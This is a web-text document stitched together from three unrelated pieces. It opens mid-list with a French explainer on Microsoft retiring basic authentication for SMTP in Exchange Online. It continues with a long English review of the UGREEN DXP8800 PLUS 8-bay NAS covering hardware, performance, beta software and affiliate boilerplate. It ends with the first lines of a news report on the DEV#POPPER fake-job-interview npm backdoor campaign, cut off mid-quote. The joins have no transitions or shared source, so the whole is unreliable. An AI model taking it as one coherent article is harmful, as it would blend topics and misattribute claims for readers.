Le client de messagerie/application envoie le nom d'utilisateur et le mot de passe à Exchange Online.
Exchange Online envoie le nom d'utilisateur et le mot de passe au fournisseur d’identités Microsoft Entra ID.
Microsoft Entra ID renvoie un ticket utilisateur à Exchange Online et l'utilisateur est authentifié.
Lorsque l'authentification basique est bloquée, elle est bloquée à l‘étape 1.
B. Risques de sécurité de l’authentification basique
L'utilisation de l'authentification basique implique l'envoi des identifiants à chaque requête, ce qui la rend vulnérable aux attaques de type man-in-the-middle. Afin de pouvoir être utilisés à chaque requête, ces identifiants sont donc souvent stockés sur le périphérique.
De plus, l’authentification basique complique, voire rend impossible l'application de l'authentification multifacteur (MFA) selon les cas.
L'authentification basique est donc fréquemment utilisée par les attaquants comme vecteur d'attaque pour contourner certaines politiques de sécurité, notamment pour réaliser des attaques de type brute force sans être bloqués par le MFA.
SMTP est aujourd’hui le dernier protocole Exchange Online qui utilise l’authentification basique. C'est pourquoi Microsoft prévoit de désactiver l’authentification basique pour SMTP en faveur de l’authentification moderne.
C. Authentification moderne
L'authentification moderne est un terme générique défini à l'origine par Microsoft, mais de nombreuses autres entreprises l'utilisent désormais pour décrire les éléments suivants :
- Méthodes d'authentification : vérifier que quelqu'un ou quelque chose est bien ce qu'il prétend être. Notamment via l’authentification multifacteur (MFA), l’authentification par carte à puce, authentification par certificat. OpenIDConnect est la norme la plus largement utilisée pour l’authentification.
- Méthodes d'autorisation : processus de sécurité qui détermine le niveau d'accès d'un utilisateur ou d'un service. OAuth2 est la norme utilisée pour l’autorisation.
- Stratégies d'accès conditionnel : stratégies qui définissent les conditions dans lesquelles certaines mesures supplémentaires doivent être prises pour accéder à une ressource.
À noter qu’il existe d’autres normes qui permettent l’authentification et/ou l’autorisation comme SAML, WS-FED.
III. Agenda étapes avant la désactivation
Microsoft a prévu un planning avant la désactivation afin de laisser le temps aux entreprises de réaliser les changements.
- Septembre 2024 : Microsoft met à jour les rapports pour indiquer si l'envoi SMTP a été réalisé via OAuth ou via l'authentification basique.
Le rapport qui sera mis à jour par Microsoft est celui présent dans le centre d'administration Exchange Online > "Rapports" > "Flux de courrier" > "Rapport sur les clients utilisant l’authentification SMTP".
- Janvier 2025 : les tenants utilisant encore l'authentification basique pour SMTP recevront une alerte dans le Centre de messages Microsoft 365.
- Août 2025 : 30 jours avant la désactivation de l'authentification basique pour SMTP, nouvelle alerte dans le Centre de messages Microsoft 365.
- Septembre 2025 : désactivation définitive de l'authentification basique pour SMTP.
IV. Impacts de la fin de l’authentification basique pour SMTP
Une fois que l'authentification basique est désactivée de manière permanente, tous les clients ou applications qui se connectent en utilisant l'authentification basique pour SMTP recevront cette réponse :
550 5.7.30 Basic authentication is not supported for Client Submission.
Sauf cas très précis, les client Outlook (bureau, web ou mobile) n’utilisent pas le SMTP, ils utilisent MAPI over HTTP. De ce fait, vos utilisateurs ne sont pas impactés par ce changement.
Cependant, il est possible que vous utilisiez SMTP pour différents usages :
Utilisation d’un outil de messagerie qui ne supporte pas MAPI over HTTP
Envoi d’e-mail depuis une application, une imprimante multi-fonction, etc.
Dans ces cas-là, si vous utilisez un compte Exchange Online avec authentification basique, vous êtes probablement à risque et vous devez agir avec l’un des cas suivants.
1. Si votre application prend en charge OAuth, reconfigurez-la en conséquence.
2. Si votre application ne prend pas en charge OAuth, envisagez une des solutions suivantes (liste non exhaustive) :
- Option 2 ou 3 de la documentation Microsoft sur la configuration des applications et multi-fonction. - High Volume Email for Microsoft 365 (pour les e-mails internes uniquement). - Azure Communication Services Email SMTP (pour les e-mails internes et externes). - Serveur de messagerie tiers (Microsoft Exchange, hMailServer ou équivalent sur les autres OS). - Solutions SaaS d'envoi d'e-mails (Brevo, Mailjet, SMTP2Go, PostMark, etc.).
UGREEN continues to push forward with its NASync series of NAS devices and although the range is pretty broad, the device in the lineup that business/professional users are looking at as an affordable alternative to Synology and QNAP is the big 8-Bay model – The UGREEN DXP8800 PLUS NAS. Pretty much the ‘top end’ model of the series, this is an 8 SATA and 2 Gen 4 M.2 NVMe SSD System, rolling out the gate with dual 10GbE connectivity, Thunderbolt 4 ports, a PCIe upgrade slot, an i5 10 Core Processor and up to 64GB of DDR5 memory. It’s ALOT. First arriving at $899 for early backers, now at $974, this system is a huge saving when compared with the $1899 Synology DS1823xs+ and $2000-3500 QNAP TVS-h874 series. But what is the catch? What compromises have UGREEN made? Ultimately, does the UGREEN DXP8800 PLUS NAS deserve your money and your data? Let’s discuss it in today’s review.
Other UGREEN NAS Reviews:
The DXP4800 PLUS 4-BAY NAS Review – VIDEO– WRITTEN
The DXP480T 4-BAY NVMe SSD NAS Review – VIDEO– WRITTEN
The DXP8800 PLUS 8-BAY 10GbE NAS Review – VIDEO– WRITTEN
Important– The UGREEN DXP8800 Plus NAS is still in the mid stages of crowdfunding. The unit provided for review by UGREEN might not represent the finished product if/when crowdfunding is concluded and eventual fulfillment begins. UGREEN is an already long-established and trusted brand, but nevertheless, it is important to keep in mind that this is still a product that is initially being made available via crowdfunding and therefore an element of additional care is always advised, compared with a comparable product purchased via traditional retail outlets.
UGREEN DXP8800 PLUS NASync Review – Quick Conclusion
Much like the rest of the NASync series, the UGREEN DXP8800 PLUS 8-Bay NAS is incredibly good value in terms of hardware and, if you are looking for the very best desktop NAS hardware for the price point available in the market – the DXP8800 PLUS is truly unbeatable in its specifications, build quality and overall physical presentation. Even going full ‘DiY’ and trying to build a system of this calibre yourself (case, cables, i5 embedded mobo, 2 port 10GbE card, 2 NVMe, 8 SATA, case, cooling, etc), you would struggle to beat the sub $999 of this system by a meaningful margin. Add to this the fact that UGREEN have now softened their stance on 3rd party NAS OS’ on their NAS devices having no aggressive impact on your 3-year hardware warranty has won a lot more users over, as the DXP8800 PLUS becomes the perfect TrueNAS or UnRAID NAS for users who don’t want the hassle of building from scratch, chasing multiple warranty’s and silicon paste under the fingernails! Genuinely, it is impossible to fault the DXP8800 PLUS on a hardware level (it’s not even that noisy, compared to other 8-Bay NAS in the market at least).
When it comes to software and performance, however, things are a little more complicated. The UGREEN NAS software (UGOS) is still very much in beta, and it feels likes it. The system (at time of writing) has still yet to complete initial crowdfunding and development of the software is still on-going (so we are still judging a software OS that hasn’t finished). But nevertheless, the absence of services such as 2 factor authentication, WORM, a comprehensive security monitor, volume encryption, a virtual machine hypervisor, broader 3rd party cloud sync and backup tools, etc – the absence of these (as well as inconsistencies in the software and performance, that arguably are possibly related to it’s beta status) lead to it being hard to recommend the DXP8800 PLUS on a software level. However, this system will not see physical fulfilment to backers till at least June/July at the very earliest, which is still a decent amount of time to polish the software and roll out beta’s of individual services that are promised on the UGREEN roadmap. Perhaps you are looking at the DXP8800 PLUS series for TrueNAS/UnRAID/OMV etc, or simply to set it up for local SMB storage for your backups and then use the docker app to run Plex. For those users, the DXP8800 is an absolute bargain. Just remember that we are still talking about Kickstarter and crowdfunding (still an odd move by such a big brand) and therefore this needs to be treated as such, not comparable to traditional retail! Overall, I am hugely impressed and look forward to seeing where this system, UGOS and UGREEN go in the exciting world of NAS in the next year or two. The DXP8800 PLUS is a BEAST of a NAS in terms of hardware, but the software is still WiP.
SOFTWARE - 6/10
HARDWARE - 10/10
PERFORMANCE - 7/10
PRICE - 10/10
VALUE - 9/10
8.4
PROS
PCIe Expandability 8 HDDs + 2x Gen 4 M.2 in 1 box under $999 Good Balanced CPU choice 10GbE Dual Ports! An SD Card Slot (wierdly rare!) 10/10 Build Quality Great Scalability Fantastic Mobile Application (even vs Synology and QNAP etc) Desktop/Browser GUI shows promise Established Brand entering the NAS Market Not too noisy (comparatively) Very Appealing retail package+accessories
CONS
10GbE Performance was less than expected Crowdfunding choice is confusing Software (still in Beta) is still far from ready 18/4/24
UGREEN DXP8800 PLUS NASync Review – Presentation
You really do have to hand it to UGREEN. The presentation of the DXP8800 Plus is genuinely top-tier. This brand’s experience in computer accessories has clearly influenced the presentation of their NAS system, opting for glossy retail packaging that boldly showcases the system’s capabilities over a standard dull brown box.
Inside the shiny box is a well-organized shipping container, with the system secured by rigid foam and an accessory kit containing everything needed to get started. As previously mentioned, retail packaging and device protection during transit are often overlooked by brands, risking damage. Despite being largely unpopulated, except for an internal 2280 SSD for the OS, minimizing the risk of damage, the extra effort on protection is appreciated.
The DXP8800 Plus includes nearly everything needed for setup, aside from hard drives. Given the early stage of the system’s crowdfunding campaign, additional storage options may later become available.
The included kit, while basic, ensures users new to hosting their own servers have everything required.
It’s the attention to detail that impresses – from M.2 NVMe heat pads of notable quality and thickness for thermal dissipation, to the included Cat 7 network cables with high-quality gold/copper ends, differentiating them from standard cables.
Even the instruction manual, a rarity as most NAS brands now direct users online, stands out with its glossy presentation and offers more than basic setup guidance.
One thing I wanted to note (especially after reviewing the DXP4800 PLUS and DXP480T NAS systems previously) is that the DXP880 8-Bay NAS arrives with 3 years of warranty, when the bulk other devices in the series arrive with 2-Years. It’s a small but significant difference, as most users who are looking at 8-Bays of storage tend to be doing so for business-related use – so that extra year will certainly be noted and appreciated!
However, the choice of a 3rd party CWT internal power supply (PSU), though expected at this scale, given UGREEN’s reputation for high-quality power adapters and cables. While not a deal-breaker, it’s curious to see a non-UGREEN PSU used, especially when the DXP480t model reviewed elsewhere came with a branded UGREEN PSU. This inconsistency in their approach to PSUs is puzzling.
Overall, the presentation of the DXP8800 Plus from UGREEN, a newcomer to the NAS market intending to launch via Kickstarter, is exceptionally well done. Despite some accessory quality inconsistencies, the overall package is commendable for a pre-release sample. Now, let’s proceed to discuss the system’s design.
UGREEN DXP8800 PLUS NASync Review – Design
At first glance, the DXP 8800 Plus appears to be a fairly standard 8 NAS enclosure, and you might be forgiven for thinking it’s just reiterating the typical case design prevalent among numerous companies. However, there’s more to its design and efficiency than meets the eye. For starters, the external enclosure is entirely metal, enhancing heat dissipation directly from the base panel housing the M.2 modules. Additionally, UGREEN has infused the design with their unique stylistic choices, evident in the presentation of individual bays and the arrangement and accessibility of various ports and connections.
The inclusion of small design flourishes, like the rear removable mesh metallic fan panel that magnetically attaches to the casing, is particularly appreciated. While such a feature is familiar to prosumer PC cases, it’s surprisingly rare in NAS designs – puzzling, given NAS systems’ continuous operation and higher likelihood of accumulating dust and debris. Despite being a relatively minor detail, this fan cover’s presence in UGREEN’s first product impresses me aesthetically and functionally.
The internal fans are two low noise standard 92mm PC fans, that can be fully controlled in their RPM by the system software manually, or left to automatically adapt to the system’s needs.
Handling individual storage bays, however, presents a mixed reaction. The bold numeric design distinguishes it aesthetically from other NAS brands that often opt for bland, nondescript bays. The tool-less, click-and-load trays that forego the need for a screwdriver for drive installation and the inclusion of individual locking mechanisms (with keys) are commendable features.
Yet, these trays feel somewhat flimsy compared to the more robust trays found in desktop solutions from Synology and QNAP. While they secure the hard drives and align with the internal enclosure runners, the internal locking mechanism doesn’t inspire confidence in its security. The trays’ perceived cheap production quality slightly detracts from the overall positive aesthetic. Despite this, the system supports the latest 22TB hard drives (testing of 24TB Seagate Ironwolf Pro HDDs in progress), which means daily interaction with these trays will be minimal.
The main storage area features a pre-constructed PCB with eight integrated SATA and power connectors. The system documentation indicates that SAS drives are unsupported, a non-issue for this system’s scale and price point.
Upon removing the base’s metallic panel, the two M.2 NVMe SSD bays and upgradable DDR5 SODIMM ports are revealed. Space constraints make heat sink installation challenging, but UGREEN has anticipated this with the inclusion of thick heat pads in the accessory kit, facilitating heat dissipation through the external casing.
UGREEN’s entry into 24/7 service storage with the DXP 8800 Plus is noteworthy, especially for a brand new to this sector. Their effort to differentiate through design and functionality is largely successful, although the storage trays’ quality could be improved. Overall, the system’s design is a strong point, and I look forward to discussing ports and connectivity next.
UGREEN DXP8800 PLUS NASync Review – Power Consumption
The DXP8800 PLUS is a beefy system and although I was expecting the system to be a little greedy on the power consumption anyway, it was still arguably a pinch higher than I expected. Initially, UGREEN stated that the power consumption of the 2 and 4 bay systems would be (for general system load):
Now, let’s put those numbers into perspective. Below is the power consumption of the DXP8800 PLUS NAS, populated with 4x Toshiba MG 8TB Enterprise HDDs, 4x Kingston DC600M SATA 480GB SSDs and 2x Kingston KC3000 NVMes, in both Idle and Active:
Based on the figures that UGREEN provided for the DXP4800 PLUS, the DXP8800PLUS was using twice the power. On the face of it, this seems reasonable (the latter system IS twice the scale in almost every way – also using a 10 Core i5 vs a 5 Core Pentium). Nevertheless, this is quite a hungry system and users looking at an 8-Bay 10G system like this, when moving away from more modest 2/4-Bay systems should be aware!
REALLY surprised at the noise level. Given the largely metal construction of the system, I expected it to hit the early 40’s in dBa, at the very least. But it was surprisingly low ambient volume (relative to other 8-Bay NAS of course). Then there is the fact that I used a combination of smaller 8TB HDDs and SSDs, which did reduce noise levels somewhat. If I had been using more aggressive 12-14TB HDDs, then the operational noise of these more industrial built drives would have been much different – but then we would be measuring HDD noise and not system noise.
UGREEN DXP8800 PLUS NASync Review – Ports and Connections
One of the earliest things to notice about the connectivity on offer on the DXP 8800 Plus NAS is that this system brings back support for SD cards. This may seem almost insane to the average photo and video editor, but SD card readers on NAS devices have been largely absent for almost a decade, despite enormous protestations from photo and video editors for years.
Therefore, it’s kind of impressive that UGREEN has opted to provide an SD card slot and a front-mounted USB Type-A 10Gbs connection, AND 2x Thunderbolt 4 USB-C conenctions on the DXP8800 Plus when practically every other brand in the NAS industry does not. It’s going to be a tremendously convenient feature for those wanting to ingest media directly into the system via numerous storage methods and camera systems, making it that much more convenient than many others in the market.
The front-mounted Thunderbolt 4 USB-C ports can only be used with the UGREEN DXP8800 PLUS as the ‘host’ and connected devices as ‘clients’. In ‘normal speak’, that means that these ports can only be used for accessories (storage etc) that are managed by the NAS. That means that currently you cannot use the Thunderbolt 3/4 USB-C port on your PC or Mac to connect with the NAS for a ‘Thunderbolt NAS’ connection, much as you would find from several QNAP Thunderbolt NAS (Guide on this HERE) devices.
Flipping the device around, we see that the system has even more USB ports that can be utilized by the system in a host-client relationship. That means that the UGREEN NAS system will act as the host device for connected storage drives and supported peripherals. Unfortunately, this does mean that you cannot directly connect to this device using those USB ports, and the USB 2.0 connections are pretty much exclusively designed for connecting printers and office peripherals, uninterruptible power supplies, or keyboard/mouse in KVM setups alongside the visual output.
The visual output of this system is a 4K 60 frames per second HDMI 2.0 connection (8K output is possible if you scale the memory up). The software for the UGREEN NAS system is still in beta, and currently, the HDMI output is limited to command line access.
Currently, there is no graphical user interface afforded to the HDMI output, such as you would find on a QNAP or Asustor NAS system, but as this is a relatively niche feature for many, I’m not going to give them too much of a hard time over this.
Although the lack of the Thunderbolt direct connectivity will be a blow for some, the majority of users will be much ,much more impressed with the network connectivity of the DXP8800 PLUS. The system arrives with two 10GbE network ports (which is exceptional at the under $999 price tag, at least during crowdfunding).
Just to put this into perspective, the Synology DS1823xs+ is an 8 Bay NAS that has 1x 10GbE connection (and 2x 1GbE) with a 4 Core / 8 Thread AMD Emb.CPU and arrives at $1800 without TAX. Likewise, the QNAP TVS-h874T4 arrives with several versions with 10GbE and/or Thunderbolt 4 connectivity (with Intel i3/i5/i7/i9 CPUs) and that system starts at around $1999 and can reach as high as $3999). We need to factor in that the DXP8800 Plus is a crowdfunding product (so therefore hardly comparable to traditional retail as a regular over the counter purchase), but whether you purchase it at the $974 crowdfunding or intended $1499 RRP (Realistically, I imagine it will sit at around $1299-1399 at full retail) – this is a HUGE saving on hardware and for a 10GbE ready system, exceedingly hard to beat. Remember though, HAVING 2x 10GbE is not the same as being able to fully USE 20GbE – that depends on so many factors (Shared internal PCI lanes and PCIe switches, SATA and NVMe controllers internally, as well as the actual media you choose to use to try and saturate the connection.
Nevertheless, this DXP8800 PLUS arriving with the two 10GBASE-T (Copper) connections with Aquantia controllers internally to manage it, is very appealing. But it does not stop there. The DXP8800 PLUS is one of a small % of the NASYnc series to feature a PCIe upgrade slot too. It’s a half-height slot and x4 speed (so largely going to be used for NIC upgrades), but nevertheless worked a treat.
Overall, in terms of ports and connectivity, I’m really happy with everything I found on the DXP8800 Plus, and the increased scalability in terms of improving upon the network connectivity down the line, as well as the price point of the base level of network connectivity, combined with a decent degree of functionality and modern storage expandability to boot. The lack of Thunderbolt direct connectivity is a shame, but this is already something of a rarity in the market anyway (QNAP dominate this and despite the likes of QSAN and Promise trying to emulate this previously, they have hit walls) and UGREEN do state they are investigating this at development. Overall, I am really happy with the hardware thus far. Let’s dig a little deeper.
UGREEN DXP8800 PLUS NASync Review – Internal Hardware
As mentioned earlier, it’s surprisingly confident of UGREEN to launch so many different NAS devices simultaneously for their first foray into network-attached storage. Not only have they provided several different storage scales and architectures, but they are also supporting three different internal hardware CPUs in terms of CPU. The scale in terms of price and capabilities of each system varies.
The DXP8800 Plus arrived with an Intel i5 10-core processor (2p + 8e), integrated graphics, 20 PCIe lanes, and a maximum 55W TDP. Despite its compact SOC form, this 12th generation Intel i5 processor offers substantial power, benchmarking well against the N100 and Pentium 8505 models in other UGreen NAS models. Testing this processor, especially in this early crowdfunding prototype, presents challenges. Though UGREEN have softened their position on 3rd party OS support (and it’s impact on your hardware warranty if you pursue this), it is still not the intended USE CASE of what UGREEN state this system is to be deployed in (to verify their claims on it’s performance). See video below for more information on this:
Consequently, we’re limited in our ability to benchmark using third-party OSs or reference previous benchmarks for similar architectures. The UGreen NAS’s operating system, still in beta, requires further optimization to fully showcase what the hardware can achieve.
This processor is well-equipped with sufficient PCIe lanes to manage the 8 SATA drives and 2x M.2 NVMe SSDs, offering respectable speeds through SSH (at least on slot #1 – more on that later). The main concern with this processor selection is the lack of ECC memory support, crucial for high-speed flash systems to minimize bit errors during intensive operations.
Although SOC processors that support ECC are rare, especially from Intel, using one for this system and potentially for the DXP8800 Plus could significantly impact the price and development timeline. Nevertheless, this CPU is arguably the best choice for such a compact system in 2024, balancing power efficiency, heat management, and performance capabilities.
Arriving with integrated graphics, supporting up to 64 gigabytes of memory (arriving with 8GB of DDR5 SODIMM and two slots), there is a lot to like here. It is especially surprising when you realize that the brand already provides closely priced N100 and Pentium models next to this device in UGREEN’s NAS portfolio. This processor performs exceedingly well with Plex Media Server and, thanks to those 20 lanes, also means there’s a decent spread of available hardware architecture across the whole device.
But do keep in mind that this system does not support ECC memory. Indeed, none of the UGREEN systems support ECC memory, and although they make a point of highlighting the on-die checks associated with DDR5, most experienced storage enthusiasts tend to prefer traditional ECC memory support. Nevertheless, 8GB is a good amount of memory to start with, and it’s great to know that you are not locked in with presoldered and fixed memory on the board, which is a move often used by more economical brands to save some money and dedicate lanes more efficiently. The layout of the internal architecture is still yet to be confirmed at the time of writing this review, but digging a little into the backend via SSH revealed that each of the M.2 NVMe slots on the base of this system are Gen 4 x 4.
However, further digging into the 2nd M.2 slot showed that it has been downgraded the 8GT/s x2 :
Not entirely sure what to make of this, as this IS a prototype review unit. But it does seemingly though a little initial shade on the whole ‘two Gen 4×4 slots’. I will need to investigate this further with the brand and when I get a further update on this, I will let you know by updating the article here. Meanwhile, the OS SSD bay that hosts the UGOS NAS software arrives on that Phison E13 Gen 3 SSD, that is downgraded the Gen 3×1 (SO, SUB 1,000MB/s performance – which is fine for the Operating System SSD, but does mean that data passing through it (or at least managed to a large degree) might be potentially bottlenecked.
So, how this all separates out on the system chipset and whether these are being delivered into PCIe switches to spread the architecture out for the rest of the system storage, double network connectivity, and dedicating lanes to all those available connections, is definitely an area that leaves pause for thought.
(image below from other UGREEN NAS Systems)
Which I had difficulty identifying, but I suspect is a Marvell AQtion Aquantia AQC113/AQC114/AQC114CS/AQC115Cs, comprising (from official pages) a high-performance,Scalable mGig, Ethernet MAC+PHY Controllers designed to support the following network rates: 10GBASE-T/5GBASET/ 2.5GBASE-T/1000BASET/100BASE-TX/10BASE-Te. When equipped with a PCI Express Gen 4 x4, this family of Scalable mGig Ethernet MAC+PHY Controllers easily handle the 10 GbE line-rate performance. The AQC113, AQC114, AQC114CS, AQC115C device family combines a mGig Ethernet MAC Controller with a full-reach, low-power, highperformance, multi-gigabit, single-port Gen 4 Ethernet Alaska PHY transceiver into a single, monolithic device that is designed using the latest 14nm, multi-gate, FinFET process technology.
(image below from other UGREEN NAS Systems)
The USB controller/manager appears to be an ASM1543, (from the ASmedia pages) a one Four to two differential channels mux switch with integrated Type-C Configuration Channel Logic Circuitry, using for USB3.1 type-C mux and CC detection application. The signal performance of mux switch is up to 10Gbps SuperSpeedPlus USB bus with low insertion loss and return loss, and it also supports USB plug orientation, configurable as DFP role or UFP role through the setting of strapping pins, and implementing the strapping for the setting/detection of Type-C current mode, following USB3.1 Revision 1.0 and USB Type-C Connector and Cable Revision 1.3 standard specification.
(image below from other UGREEN NAS Systems)
Next, we find a Richtek RT3624BE, (from the manf pages) a synchronous buck controller which supports 2 output rails and can fully meet Intel IMVP9.1 requirements. The RT3624BE adopts G-NAVPTM (Green Native AVP) which is Richtek’s proprietary topology derived from finite DC gain of EA amplifier with current mode control, making it easy to set the droop to meet all Intel CPU requirements of AVP (Adaptive Voltage Positioning). Based on the G-NAVPTM topology, the RT3624BE features a new generation of quick response mechanism (Adaptive Quick Response, AQR) to optimize AVP performance during load transient and reduce output capacitors. The RT3624BE integrates a high accuracy ADC for platform and function settings, such as ICCMAX, switching frequency, over-current threshold or AQR trigger level.
(image below from other UGREEN NAS Systems)
In terms of the SATA storage management, I found a ASMedia ASM116 SATA host controller(AHCI). (TBC) Which is upstream PCIe Gen3 x2 and downstream eight SATA Gen3 ports. It’s a low latency, low cost and low power AHCI controller. With four SATA ports and cascaded port multipliers, ASM1164 can enable users to build up various high speed IO systems, including server, high capacity system storage or surveillance platforms.
(image below from other UGREEN NAS Systems)
Earlier in March when I was testing the (late alpha, early Beta) version of the NAS software, system and services, the performance numbers I got were not hugely encouraging internally. However, there have been numerous improvements on the system software and I am pleased to confirm that the M.2 NVMe slot 1 was indeed 4×4 bandwidth and that some brief 1GB transfer/creation testing showed some early 5.5GB/s benchmarks on the Gen 4×4 SSD I has inside the system.
Now we cannot rule out the impact of caching internally and these tests are NOT reflective of everyday (i.e non synthetic) use, but it was definitely an encouraging sign. However, when I tried to repeatedly move 1GB of data between each of the NM,2 NVMe, the performance would drop down to 1.1-1.5Gb/s, which further suggested some lane sharing and a possible bottleneck by a controller and/or that downgrade perhaps. Again, this is a beta software/system and UGREEN repeated that this system is still undergoing optimization.
External performance over 10GbE was also an area that I really, REALLY hope this is sees significant optimization. I was hitting a bottleneck of around 650-700MB/s on upload and download (on a 10Gbe / 1,000MB/s connection). The performance numbers below were over 10GbE (with the MTU set at 1500 – As the software is currently not allowing me to scale it to 9000 MTU/Jumbo frames). Below is the tests for 4x 8TB Toshiba HDDs in RAID 5, 4x Kingston DC600M SATA SSDs in RAID 0 and 1x Kingston KC3000 Gen4 NVMe SSD.I then went ahead and conducted a windows 10GbE transfer to the RAID 5 array:
Further testing confirmed performance dips when transferring data between SSDs, indicating a shared pathway. Despite this being a pre-release sample, and acknowledging potential future optimizations, the observed SSD performance, though still faster than many market alternatives, fell comparatively short of expectations given the hardware capabilities (though still higher than the majority of M.2 SSD performance offered by other brands providing HDD SATA + M.2 solutions right now).
The UGREEN NAS’s software, still in beta, promises further insights into the brand’s direction with their NAS solution and its accompanying software and services, warranting a closer examination as development progresses.
UGREEN DXP8800 PLUS NASync Review – Software
At the time of writing, the UGREEN NAS software is still in beta, with the mobile application is live now. Reviewing the software included with the DXP8800 Plus—as a final product—feels somewhat premature. The NASsync software beta reveals many baseline functions and long-term plans, detailed in the video below in our initial overview and first impressions of the UGREEN NAS software:
it’s on track to become a smooth and user-friendly experience, comparable to giants like Synology and QNAP, especially in terms of the web browser experience. Unlike opting for the complexity of TrueNAS or the streamlined, container-focused UI of UnRAID, the UGREEN NAS software is more akin to Synology DSM. The foundation is clearly laid out for expansion in terms of features and tools for the user’s disposal. However, there are notable absences of baseline applications such as container or virtual machine support, and a multi-tiered backup solution within the web GUI (though the UGREEN NAS mobile and desktop clients are in development, expected to preview in March). Basic services for file management, shares, user account control, and an app center—soon to be linked to a repository—are all user-friendly but present some inconsistencies, likely due to its beta status and ongoing development. The physical product may be closer to final development, but the software needs more time for optimization. SMB services were less consistent than desired, and settings changes sometimes didn’t save or recall correctly. This is common for beta software finding its footing, yet it’s important to note that the hardware feels more refined than the software at this stage, months before user delivery. In brief:
What I liked:
Intuitive UI with services located logically and responsive controls.
The mobile application for iOS and Android is one of the best I have ever used in NAS!
Baseline services such as network interface management, user account control, firewall handling, and SSH interface control are all present.
A clearly defined app center awaiting connection to an online repository.
Helpful tips and guidance are available on most pages, aiding new users.
Support for modern services like SMB3 multi-channel and domain services in the beta.
Clear account and resource management accessible from the desktop, likely appealing to most users.
The inclusion of a remote access relay service and UGREEN account creation from day one, simplifying remote access for new users with built-in firewall and domain tools.
UPDATE 5/4/24 – The HDMI output is now full controllable via the mobile application and is intiuative
UPDATE 5/4/24 – A Docker application has now been added with access to numerous repository options!
UPDATE 5/4/24 – SSH is now disabled by default
What I disliked:
Absence of two-factor authentication in the software.
Lack of virtualization applications at this stage.
Sporadic SMB performance.
The Security Advisor tool is only suitable for Antivirus and Anti-Maleware protection, not to scan the system for security weaknesses and advisory actions
The HDMI output cannot be used by the desktop/browser user to the same extent as the mobile application + cannot be used by container tools (Plex, Home Automation, etc)
In-progress language integration, leading to occasional default displays in Chinese or error messages in Chinese despite English settings.
Improvements needed:
Expansion of app integration and desktop client tools for easier system-client bridging.
Introduction of a default application for device discovery on the local network, a basic service offered by many NAS brands.
More information on UGREEN account and remote access security.
Acknowledging this is a beta, it’s fair to reserve full judgment until the software fully rolls out. As it stands, this beta is promising yet lacks some established NAS software fundamentals. Hopefully, we’ll see significant advancements as the release approaches.
UGREEN DXP8800 Plus NAS Storage Review – Verdict and Conclusion
Much like the rest of the NASync series, the UGREEN DXP8800 PLUS 8-Bay NAS is incredibly good value in terms of hardware and, if you are looking for the very best desktop NAS hardware for the price point available in the market – the DXP8800 PLUS is truly unbeatable in its specifications, build quality and overall physical presentation. Even going full ‘DiY’ and trying to build a system of this calibre yourself (case, cables, i5 embedded mobo, 2 port 10GbE card, 2 NVMe, 8 SATA, case, cooling, etc), you would struggle to beat the sub $999 of this system by a meaningful margin. Add to this the fact that UGREEN have now softened their stance on 3rd party NAS OS’ on their NAS devices having no aggressive impact on your 3-year hardware warranty has won a lot more users over, as the DXP8800 PLUS becomes the perfect TrueNAS or UnRAID NAS for users who don’t want the hassle of building from scratch, chasing multiple warranty’s and silicon paste under the fingernails! Genuinely, it is impossible to fault the DXP8800 PLUS on a hardware level (it’s not even that noisy, compared to other 8-Bay NAS in the market at least).
When it comes to software and performance, however, things are a little more complicated. The UGREEN NAS software (UGOS) is still very much in beta, and it feels likes it. The system (at time of writing) has still yet to complete initial crowdfunding and development of the software is still on-going (so we are still judging a software OS that hasn’t finished). But nevertheless, the absence of services such as 2 factor authentication, WORM, a comprehensive security monitor, volume encryption, a virtual machine hypervisor, broader 3rd party cloud sync and backup tools, etc – the absence of these (as well as inconsistencies in the software and performance, that arguably are possibly related to it’s beta status) lead to it being hard to recommend the DXP8800 PLUS on a software level. However, this system will not see physical fulfilment to backers till at least June/July at the very earliest, which is still a decent amount of time to polish the software and roll out beta’s of individual services that are promised on the UGREEN roadmap. Perhaps you are looking at the DXP8800 PLUS series for TrueNAS/UnRAID/OMV etc, or simply to set it up for local SMB storage for your backups and then use the docker app to run Plex. For those users, the DXP8800 is an absolute bargain. Just remember that we are still talking about Kickstarter and crowdfunding (still an odd move by such a big brand) and therefore this needs to be treated as such, not comparable to traditional retail! Overall, I am hugely impressed and look forward to seeing where this system, UGOS and UGREEN go in the exciting world of NAS in the next year or two. The DXP8800 PLUS is a BEAST of a NAS in terms of hardware, but the software is still WiP.
PROS of the UGREEN DXP8800 PLUS NAS
CONS of the UGREEN DXP8800 PLUS NAS
PCIe Expandability 8 HDDs + 2x Gen 4 M.2 in 1 box under $999 Good Balanced CPU choice 10GbE Dual Ports! An SD Card Slot (wierdly rare!) 10/10 Build Quality Great Scalability Fantastic Mobile Application (even vs Synology and QNAP etc) Desktop/Browser GUI shows promise Established Brand entering the NAS Market Not too noisy (comparatively) Very Appealing retail package+accessories
10GbE Performance was less than expected Crowdfunding choice is confusing Software (still in Beta) is still far from ready 18/4/24
Click the Link Below to find out more about the UGREEN NASync NAS Series on the brand’s official Site:
This description contains links to Amazon. These links will take you to some of the products mentioned in today's content. As an Amazon Associate, I earn from qualifying purchases. Visit the NASCompares Deal Finder to find the best place to buy this device in your region, based on Service, Support and Reputation - Just Search for your NAS Drive in the Box Below
Need Advice on Data Storage from an Expert?
Finally, for free advice about your setup, just leave a message in the comments below here at NASCompares.com and we will get back to you.Need Help?
Where possible (and where appropriate) please provide as much information about your requirements, as then I can arrange the best answer and solution to your needs. Do not worry about your e-mail address being required, it will NOT be used in a mailing list and will NOT be used in any way other than to respond to your enquiry.
[contact-form-7]
TRY CHAT Terms and Conditions
If you like this service, please consider supporting us.
We use affiliate links on the blog allowing NAScompares information and advice service to be free of charge to you.Anything you purchase on the day you click on our links will generate a small commission which isused to run the website. Here is a link for Amazon and B&H.You can also get me a Ko-fi or old school Paypal. Thanks!To find out more about how to support this advice service checkHEREIf you need to fix or configure a NAS, check FiverHave you thought about helping others with your knowledge? Find Instructions Here
Or support us by using our affiliate links on Amazon UK and Amazon US
Alternatively, why not ask me on the ASK NASCompares forum, by clicking the button below. This is a community hub that serves as a place that I can answer your question, chew the fat, share new release information and even get corrections posted. I will always get around to answering ALL queries, but as a one-man operation, I cannot promise speed! So by sharing your query in the ASK NASCompares section below, you can get a better range of solutions and suggestions, alongside my own.
An ongoing social engineering campaign is targeting software developers with bogus npm packages under the guise of a job interview to trick them into downloading a Python backdoor.
Cybersecurity firm Securonix is tracking the activity under the name DEV#POPPER, linking it to North Korean threat actors.
"During these fraudulent interviews, the developers are often asked
